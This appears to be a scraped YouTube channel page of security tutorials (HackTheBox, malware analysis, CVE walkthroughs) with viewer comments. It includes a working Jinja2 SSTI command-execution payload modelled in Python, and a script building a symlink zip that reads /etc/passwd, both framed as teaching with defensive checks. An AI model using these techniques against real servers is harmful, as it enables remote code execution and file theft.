- Videos: 301
- Views: 279,628
0xdf
USA
Added 20 Oct 2018
Python Flask Jinja2 SSTI Payload Analysis
I'll walk through a common SSTI payload pulled from PayloadsAllTheThings and look at how it works: it uses the Flask request object to reach a function, whose __globals__ exposes that function's module namespace. From there it pulls the __builtins__ dictionary and the __import__ function.
Payload: github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---filter-bypass
Flask Request object: flask.palletsprojects.com/en/3.0.x/api/#flask.Request
Flask globals: flask.palletsprojects.com/en/3.0.x/templating/#standard-context
Jinja2 attr: jinja.palletsprojects.com/en/3.1.x/templates/#jinja-filters.attr
Python Function attributes: docs.python.org/3/reference/datamodel.html...
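The attribute chain the payload walks, as an added example rather than code from the video or from PayloadsAllTheThings. It needs neither Flask nor Jinja2: FakeRequest stands in for the Werkzeug request (its application attribute is a classmethod, as Werkzeug's is, which is all the payload needs), and jinja_style_getattr mimics how Jinja2 resolves a.b (try getattr, then fall back to a['b']). That fallback is why __builtins__.__import__ works inside a template even though __builtins__ is a plain dict in every module except __main__. The sandbox model at the end reproduces the rule jinja2.sandbox.SandboxedEnvironment applies to attribute names starting with an underscore; it is a simplification, since the real sandbox also blocks a few type-specific internal attributes. FakeRequest, PAYLOAD_PATH and the function names are this example's own.

```python
"""Walk the attribute chain behind the Jinja2 SSTI payload

    {{ request.application.__globals__.__builtins__.__import__('os').popen('id').read() }}

in plain Python, with no template engine involved.  Added example; not code
from the video or from PayloadsAllTheThings.  FakeRequest, PAYLOAD_PATH and
the helper names are assumptions of this example.
"""
import builtins


class FakeRequest:
    """Stand-in for the Werkzeug/Flask request object.  Werkzeug's Request has
    a classmethod `application`; the payload only needs *some* Python-defined
    function whose __globals__ it can read, so that is all we model."""

    @classmethod
    def application(cls, f):
        return f


def jinja_style_getattr(obj, name):
    """Mimic Jinja2's Environment.getattr: attribute first, then item lookup.

    The item fallback is what lets `__builtins__.__import__` resolve when
    __builtins__ is a dict (every module except __main__)."""
    try:
        return getattr(obj, name)
    except AttributeError:
        try:
            return obj[name]
        except (KeyError, TypeError, IndexError):
            raise LookupError(f"{name!r} not found on {type(obj).__name__}") from None


# The dotted part of the payload, split the way the template parser would.
PAYLOAD_PATH = ["application", "__globals__", "__builtins__", "__import__"]


def resolve(root, path):
    """Follow `path` from `root`, one Jinja2-style lookup per segment."""
    obj = root
    for name in path:
        obj = jinja_style_getattr(obj, name)
    return obj


def payload_reaches_import(request):
    """True when the chain ends at the real builtins.__import__ function."""
    return resolve(request, PAYLOAD_PATH) is builtins.__import__


def ssti_import(request, module_name):
    """The `__import__('os')` step: import any module through the chain."""
    return resolve(request, PAYLOAD_PATH)(module_name)


def ssti_rce(request, command):
    """The full payload: __import__('os').popen(command).read()."""
    return ssti_import(request, "os").popen(command).read().strip()


def first_blocked_name(root, path):
    """Model of SandboxedEnvironment.is_safe_attribute (an assumption of this
    example): any attribute whose name starts with '_' is refused.  Returns
    the first refused segment, or None when the whole chain resolves."""
    obj = root
    for name in path:
        if name.startswith("_"):
            return name
        obj = jinja_style_getattr(obj, name)
    return None


if __name__ == "__main__":
    req = FakeRequest()
    print("reaches __import__:", payload_reaches_import(req))
    print("popen output:", ssti_rce(req, "echo hello"))
    print("sandbox blocks at:", first_blocked_name(req, PAYLOAD_PATH))
```

The same chain run through a real SandboxedEnvironment stops at the first underscore-prefixed name, so a sandbox (or, better, never rendering user input as template source) is the fix; escaping the input does nothing, because the braces are interpreted before any HTML escaping happens.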
Views: 1,008
Videos
Digging into OFBiz Exploitation
916 views, 2 months ago
There was a diary on the SANS Internet Storm Center page about increased exploitation attempts at their honeypots for CVE-2024-32113, which gives RCE against Apache OFBiz instances. I'll show how the exploit works on the HackTheBox Bizness machine, then look at the patches for CVE-2024-32113, and then at where the exploit is actually fixed, in the patches for CVE-2024-36104. SANS ISC Article...
Splunk Docker Container for CloudTrail Analysis
1K views, 4 months ago
When it comes to analysis of a large set of log files, it can be super useful to have an instance of Splunk available to work with. Getting Splunk set up can be intimidating, but it doesn't have to be. I'll show how to stand up a Splunk Docker container and load AWS CloudTrail logs into it. Splunk Docker: docs.splunk.com/Documentation/Splunk/9.2.1/Installation/DeployandrunSplunkEnterpriseinside...
Hash Extension Attack [HackTheBox Ouija]
855 views, 5 months ago
In Ouija, I need to do a Hash Extension attack to escalate access against an API. The issue is that I don't know the secret length. I'll use Python to write a wrapper around hash_extender to try lengths one by one and test them against the API until I find the right length, which means I have a valid hash. HackTheBox Ouija Blog post: 0xdf.gitlab.io/2024/05/18-htb-ouija.html HackTheBox Ouija: ww...
Reversing APT29 Duke Malware
1.3K views, 5 months ago
I'm looking at three binary files. The first is a legitimate Microsoft-signed exe. The second is a stub DLL that does nothing. The third is APT29 malware that is DLL side-loaded by the legitimate executable. I'll show how the DLL opens the decoy document, loads wininet.dll using LdrLoadDll, and then connects to the Zulip chat service for C2 (including the username and password). This malware comes fro...
HackTheBox Napper: Read Elastic, Generate Key, Decrypt Blob in Golang
453 views, 5 months ago
In Napper from HackTheBox, I'll need to pull values from an Elastic database that rotate every 5 minutes. The values are a seed and an encrypted blob. I'll use the seed with Go's random function to generate a key, and use it to AES-decrypt the blob. So today we're working in Go! HackTheBox Napper Blog post: 0xdf.gitlab.io/2024/05/04/htb-napper.html HackTheBox Napper: www.hackthebox.com/ma...
JavaScript / Bat File Polyglot Malware Dropper
600 views, 5 months ago
I've got a `unc.js` file that is actually a polyglot, a file that meets the specs of two different languages / formats. It's not only JavaScript, but a valid Windows bat file. I'll show how to deobfuscate both the JS and the bat to see how it drops and runs a Windows binary. This malware comes from HackTheBox's Einladen Sherlock. HackTheBox Einladen Blog post: 0xdf.gitlab.io/2024/05/02/htb-sher...
Decrypting AsyncRAT Configuration Values with CyberChef
505 views, 5 months ago
I've got a malware sample with a bunch of configuration values that are decrypted using AES, but not in the standard way CyberChef would do it. I'll show how the program is set up, and then pivot to CyberChef, using many operations, including Register, Derive PBKDF2 key, and AES Decrypt, to get the IV and ciphertext, generate the key, and decrypt the value. This malware comes from the Ein...
Writing a Webshell Joomla Plugin [HackTheBox - DevVortex]
503 views, 6 months ago
I found myself with Super Admin access to a Joomla site. I thought (incorrectly) that I couldn't edit the templates, so I set out to write a malicious plugin to provide a webshell, which I'll show in this video. HackTheBox DevVortex Blog post: 0xdf.gitlab.io/2024/04/27/htb-devvortex.html HackTheBox DevVortex: www.hackthebox.com/machines/devvortex Joomla Plugin Docs: docs.joomla.org/J4.x:Creatin...
Gameover(lay) Exploit Explained
694 views, 7 months ago
The Gameover(lay) (CVE-2023-2640 / CVE-2023-32629) vulnerability was a big deal in late July 2023. The PoC is super short, and yet complex. We'll walk through the lines one by one and understand what it's doing and how it gives a low-privilege user root access by abusing OverlayFS and the way it handles file attributes (like capabilities) when copying files between the lower and upper layers. Exploit: unsha...
Playing with Jenkins File Read [CVE-2024-23897]
3.5K views, 8 months ago
I'm looking at CVE-2024-23897, a partial file read vulnerability in Jenkins that can lead to RCE. The goal of this video is to understand the vulnerability, look at a Python PoC for the exploit, understand what it does, and then run it and compare it to the output when exploiting manually with the Jenkins CLI (run as a Java jar file). Jenkins CVE-2024-23897 disclosure: www.jenkins.io/security...
Exploring Docker Registry Auth [HackTheBox RegistryTwo]
601 views, 8 months ago
I'm looking at a Docker registry server and an auth server. I'll show how I can manually request a token from the auth server, and then use Wireshark and Burp to look at how Docker does that for me when running docker pull. HackTheBox RegistryTwo: www.hackthebox.com/machines/registrytwo RegistryTwo Blog Post: 0xdf.gitlab.io/2024/02/03/htb-registrytwo.html#docker-registry tcp-5000 5001 DockerReg...
Automating Malicious Zip with Symlinks [HackTheBox Zipping]
834 views, 9 months ago
In the Zipping box from HackTheBox, I can read files from the target host by submitting a zip file containing a symlink to the file I want to read. That can be done manually, but I'll want to script it to make life easier for myself. In this video, I'll show the vulnerability and then write the script. I'll use zipfile, io.BytesIO, regex, and requests. I'll update the script to handle cleanly b...
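The malicious archive itself, as an added example rather than the video's script. Python's zipfile has no symlink API, so the trick is to set the Unix mode bits in the top 16 bits of ZipInfo.external_attr to S_IFLNK and write the link target as the entry's data, which is what a Unix-created zip containing a symlink looks like on disk. The HTTP upload, form field and target URL are not modelled; describe_entries and safe_to_extract are this example's own helpers and show the check a defender's upload handler could apply before extracting.

```python
"""Build an in-memory zip whose single entry is a symlink, then parse it back.

Added example; not the video's script.  Entry names and targets below are
constructed sample values.
"""
import io
import stat
import zipfile


def symlink_zip(link_name: str, target: str) -> bytes:
    """Return zip bytes with one entry `link_name` that is a symlink to `target`.

    Unix-created archives keep the file mode in the top 16 bits of
    ZipInfo.external_attr; for a symlink the entry's *data* is the target path.
    Extractors that honour those bits (GNU unzip on Linux, for one) recreate the
    link on extraction, so the archive can point at any file the extracting
    user can read."""
    info = zipfile.ZipInfo(link_name)
    info.create_system = 3                         # 3 = Unix, so the mode bits are honoured
    info.external_attr = (stat.S_IFLNK | 0o777) << 16
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(info, target)
    return buf.getvalue()


def plain_zip(name: str, content: str) -> bytes:
    """Return zip bytes with one ordinary file entry, for comparison."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, content)
    return buf.getvalue()


def describe_entries(zip_bytes: bytes):
    """Parse an archive into (name, is_symlink, link_target) tuples.

    `link_target` is the entry data when the mode says symlink, else None."""
    out = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            is_link = stat.S_ISLNK(info.external_attr >> 16)
            target = zf.read(info).decode() if is_link else None
            out.append((info.filename, is_link, target))
    return out


def safe_to_extract(zip_bytes: bytes) -> bool:
    """Defender-side check: refuse symlink members and path-escaping names.

    Rejects any entry with S_IFLNK in its mode, an absolute name, or a '..'
    path component (the classic zip-slip case).  Returns True only when every
    member is a plain relative file or directory entry."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if stat.S_ISLNK(info.external_attr >> 16):
                return False
            name = info.filename.replace("\\", "/")
            if name.startswith("/") or ".." in name.split("/"):
                return False
    return True


if __name__ == "__main__":
    evil = symlink_zip("link.txt", "/etc/passwd")
    print(describe_entries(evil), safe_to_extract(evil))
    good = plain_zip("notes.txt", "hello")
    print(describe_entries(good), safe_to_extract(good))
```

Note that Python's own zipfile.extractall ignores the mode bits and simply writes the target path as the file's contents, so whether the symlink is recreated depends entirely on which extractor runs on the server; the read only succeeds if the extracting user can read the target and the application later serves or opens the extracted path.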
Linux 101 [Sans Holiday Hack 2023]
738 views, 9 months ago
The Linux 101 terminal in the 2023 Holiday Hack Challenge is a great chance to learn Linux command line tricks and techniques. Holiday Hack 2023 Solution: 0xdf.gitlab.io/holidayhack2023/ Holiday Hack 2023 Game: 2023.holidayhackchallenge.com/ ☕ Buy Me A Coffee: www.buymeacoffee.com/0xdf [00:00] Introduction [00:30] Q1 - Terminal Overview [00:47] Q2 - ls [00:56] Q3 - cat [01:20] Q4 - rm [01:38] Q...
Hacking Reportinator [Sans Holiday Hack 2023]
310 views, 9 months ago
In the Reportinator challenge, I'm asked to evaluate findings written by an AI and find the ones that are wrong or don't make sense. In this video, I'll look at how the answers are submitted and use the Python httpx async library to brute force all possible combinations and find the answer. Holiday Hack 2023 Solution: 0xdf.gitlab.io/holidayhack2023/ Holiday Hack 2023 Game: 2023.holidayhackchallenge....
Hacking Luggage Lock [Sans Holiday Hack 2023]
271 views, 9 months ago
Day 25: Snowverload [AOC2023 Python]
260 views, 10 months ago
Day 24: Never Tell Me The Odds [AOC2023 Python]
205 views, 10 months ago
Day 22: Sand Slabs [AOC2023 Python]
154 views, 10 months ago
Day 21: Step Counter [AOC2023 Python]
340 views, 10 months ago
Day 20: Pulse Propagation [AOC2023 Python]
174 views, 10 months ago
Day 18: Lavaduct Lagoon [AOC2023 Python]
174 views, 10 months ago
Day 17: Clumsy Crucible [AOC2023 Python]
376 views, 10 months ago
Reversing and Brute-Forcing TOTP Browser Plugin Export [HackTheBox Coder]
318 views, 10 months ago
Modifying .NET Exe: Encrypt to Decrypt [HackTheBox Coder]
650 views, 10 months ago
Day 16: The Floor Will Be Lava [AOC2023 Python]
105 views, 10 months ago
Day 15: Lens Library [AOC2023 Python]
116 views, 10 months ago
Day 14: Parabolic Reflector Dish [AOC2023 Python]
167 views, 10 months ago
Very detailed video. Need more on this type of data sanitization techniques.
good one
Started doing HTB as soon as I finished the Google cert and I've never been so motivated. Searched up DNS C2 analysis to see what it entailed. Thank you for sharing, it's clear you have experience in this field and the level of intuition is what I'm striving for!
how did you know to use that payload as the username?
check out the link to the full writeup for that!
thank you very much - very good explained
I followed along with you on VS code and I did not get the same results as you. I triple checked my code and no "Hello" return, nothing was the same. Help!
Bro, were you using Kali Linux or Windows? Ubuntu or another version of Linux would work too, but not Windows. So keep that in mind.
Coming back to comment on this video again. I am currently working on a HTB reversing challenge. x86 ELF written in Rust. The challenge and the script is similar to this one. But for some reason I am unable to crack it and find the HTB{flag}. I had the assumption it may have had a stack overflow vulnerability but now I'm certain that wasn't it. I set breakpoints similar to this video. After I enter c to hit the second one, it makes me type in a phrase I have to figure out. It then jumps to a breakpoint after it. I have breakpoints set to a function it goes to called check_flag. The main relevant parts of the script and that function I see are where there's cmp assembly instructions. No matter what I do, even when I manually set the cmp breakpoints registers to the correct value, I cannot seem to find anywhere where the phrase is, doing x/s, x/16, x/32, x/16i etc. I can even navigate the script til the very end by breakpoint completely and move past and stepi all the places in the script without getting a SIG error. It's been driving me nuts, I am not sure what I am doing wrong. I also don't see the ------------------------stack--------------------- content like this video has at my breakpoints, I can only see additional content if I enter info frame or disassemble. Also use ghidra alongside it.
This is an absolute gem. Using the same exact language and tools on a rust elf.
Excellent - and exactly what I was looking for!!!
You are the best ❤❤❤
This is absolutely fantastic. I agree that this would also be perfect for medium and up difficulty for learning!
Currently available for almost all retired easy and medium machines!
Sorry, I don't know a lot about it, and I understand the code part, so almost all the video, but I don't understand the final part: what have we obtained?
we have managed to write a webshell to the box. a webshell is basically a script (in this case PHP) that will run system commands on the box based on incoming HTTP requests.
mint af. great to hear this explained in detail
Intro gave me a seizure, thanks
Very interesting. Thank you for taking the time to explain it.
Awesome! As usual:)
What Linux distribution do you use?
My hacking VM is Ubuntu Mate.
this was very helpful I admire you for being able to explain such intrinsic concepts of the Python language so well. I hope one day to reach your level.
Very new to this python debugging technique. Solved the machine earlier but found your video on how to create and debug python code. Amazing stuff. Bravo
It would be nice if you can put that bash file on a github repo!
Hi, can you share how you research? Like, suppose you've got a new term or tech stack, how would you go from knowing nothing to getting something you can make use of to get the work done? The main question is how do you look for what you want. Sorry for my bad English.
Hey! So learning to google well and find stuff is the one of the most important skills in hacking. Like, understanding the tech is good, but knowing how to find things is critical. I'll have to think about if I can explain my strategy. A lot of it just comes with practice.
Hey 0xdf, I saw that you solved almost all boxes in HTB. Do you solve them all by yourself?
I mostly work on my own, though I have a good group of friends that I bounce ideas off when I'm stuck.
@@0xdf cool, bro. Do you plan to solve all boxes?
@@AUBCodeII I mean, there's a new one every week, so it's kind of a moving target. I had them all at one point. I think I'm missing 5 right now. I'll get to them before they retire. As far as I know, my blog is the only site on the internet with a writeup for every retired HTB machine, which I'm proud of.
@@0xdf I see. Congrats for the discipline to complete almost every box and thanks for writing detailed write-ups. You rock
@@AUBCodeII Thank you! It's been a lot of work, but it's been mostly enjoyable along the way!
Excited for your new box releasing this Saturday and thanks, because your writeups helped me a lot. Have a great day.
Me too! I hope people like it. And thanks for taking the time to leave a comment. It means a lot!
Awesome explanation! I always wondered how this shell upgrade works. You explained it really well.
Thanks!
Maybe you rarely discuss this, I would like to know regarding the environment you use for hacking (OS, VM etc) if you can tell me to use it as a reference
I typically work from an Ubuntu Mate VM. I have a Windows VM as well that I use with the FlareVM installer.
What if the target server is Windows? What file do we need to search to obtain sensitive information?
would have to look in more detail into what jenkins stores where on windows. would probably be worth spinning up a Windows VM and installing jenkins to check it out.
@@0xdf I really searched well but I didn't find any CVE or GitHub report for Windows. Yeah, I should try installing Jenkins on a VM, thanks
Code for ssh instance to authenticate username and password:

    import threading

    import paramiko


    class SSHServer(paramiko.ServerInterface):
        def __init__(self, username, password):
            self.event = threading.Event()
            self.username = username
            self.password = password
            self.authenticated = False

        def check_channel_request(self, kind, channel):
            if kind == 'session':
                return paramiko.OPEN_SUCCEEDED
            # paramiko has no REJECT constant; refuse any other channel type
            return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED

        def check_auth_password(self, username, password):
            if username == self.username and password == self.password:
                self.authenticated = True
                return paramiko.AUTH_SUCCESSFUL
            return paramiko.AUTH_FAILED

        # def check_auth_publickey(self, username, key):
        #     return paramiko.AUTH_FAILED

        def check_channel_shell_request(self, channel):
            self.event.set()
            return True

        def check_channel_pty_request(
            self, channel, term, width, height, pixelwidth, pixelheight, modes
        ):
            return True

Hope it helps
Thx :)
Hey, Can you create solve videos for Hard sherlocks. I read your writeups and it's really helpful but a video would be better.
Hey, been a bit behind on content during summer travels and such. Any particular sherlock?
What is your Linux distribution?
Ubuntu Mate
do you play mtg arena ?
Occasionally, yes :)
greatttttttttttttt
Thank you for this! Attempting a rust decomp challenge rn and it's driving me nuts lol
cool😍😍
Hey, 0xdf. Let's get OSEE before John Hammond does
Please, if possible, cover these advanced topics: how to bypass Drupal CMS or other secured CMSes? How to bypass hard WAF protection that stops HTML, SQL, and XSS injection payloads? Payload single/double/triple encoding using CyberChef? How to find the real origin IP of secured websites behind Cloudflare, Akamai, ModSecurity, AWS CDN, etc.? How to bypass a hard WAF using sqlmap or Burp Suite? How to find hidden vulnerable parameters and endpoints inside .js and .json files? How to find hidden admin pages, cPanel pages, and WHM pages? Please cover these important topics. Thanks
nice guide, thank you
Danke
Next time DELETE SQLI sir
hello , thank you for your videos, i follow you also on linkedin, would you please share a list of youtube channel such as yours , simple quiet and lot of beneficial ,thank you man
Obviously Ippsec. John Hammond, LiveOverflow, NetworkChuck...
@@0xdf thank you and have a nice day
@@alexhichamk6630 xct
> Splunk > CloudTrail yep i knew you would be talking about nubilium1/2 haha
Yeah, I'm stuck on nubilium2 and waited for someone to actually post a guide about it! SO BLESSED
Push!
Hello sir 👋👋
GOOD!🎉
Hey man, I'm new, like a complete beginner trying to do projects, and I chose a honeypot. Is this exactly how to build a honeypot? Because, for example, I decided to follow the video and I'm gonna go off your code and try understanding it, but this is how to create a honeypot, right?
Hey, this is one way. If I were starting from scratch I may just deploy an existing honeypot project like cowrie
I really love your content. Thanks!
By far the best analysis I've seen about APT29. Thank you so much, sir!
Great breakdown!
Thanks for sharing as always, love the content, you're amazing my friend.